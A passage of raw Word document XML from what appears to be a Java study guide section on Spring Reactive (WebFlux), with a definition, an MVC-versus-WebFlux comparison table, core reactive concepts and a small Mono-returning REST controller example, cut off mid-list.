      </w:r>
    </w:p>
    <w:p w14:paraId="5341B936" w14:textId="4C59B5BC" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc196307961"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Reactive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="1B6B3402" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF636B3" w14:textId="273C1829" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc196307962"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Spring Reactive framework?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="50948CA6" w14:textId="19E2542D" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Reactive Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a framework introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications that can </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle a large number of concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE49DEF" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00000000" w:rsidP="0062410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4CE4F9D">
          <v:rect id="_x0000_i2190" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BCDA9" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Traditional vs Reactiv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6"/>
        <w:gridCol w:w="2596"/>
        <w:gridCol w:w="2983"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="48D139B2" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5DC5B3" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00624104">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6476673A" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00624104">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring MVC (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D62F802" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00624104">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring WebFlux (Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="471E0B18" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D9F3AC2"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Programming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009DD6D5"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Blocking (Servlet-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42475F41"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Non-blocking (Reactive Streams)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="5EDC0BC7" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="669C6BC9"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DFF695"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>One thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40036F92"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Event loop (fewer threads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="26999C0F" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ABCC608"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance under Load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7705FA98"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can degrade with more load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B6B8351"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scales well under heavy load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="2A381476" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E04B8EC"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>API Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46372EE5"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Servlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0ED617"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reactive Streams API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4475C01E" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00000000" w:rsidP="0062410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9D11DD7">
          <v:rect id="_x0000_i2191" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74582326" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Core Concepts in Spring Reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74496A5A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Emits 0 or 1 item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F820125"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Emits 0 to N items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972CB6B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reactive Streams) → Produces data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2C60D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Consumes data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4B611"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Controls data flow to avoid overloading consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E97FBE" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00000000" w:rsidP="0062410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67298D9">
          <v:rect id="_x0000_i2192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6867F" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Reactive REST API using Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F29452"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30F3FE"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public class UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D27D3" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BD873F"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    @GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA3B33"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    public Mono&lt;User&gt; getUser(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE0006"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        return userService.getUserById(id); // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813C09E"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D15074"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710850EC" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00000000" w:rsidP="0062410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55E8B36">
          <v:rect id="_x0000_i2193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67156551" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tech Stack Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCD0BC"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default), </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
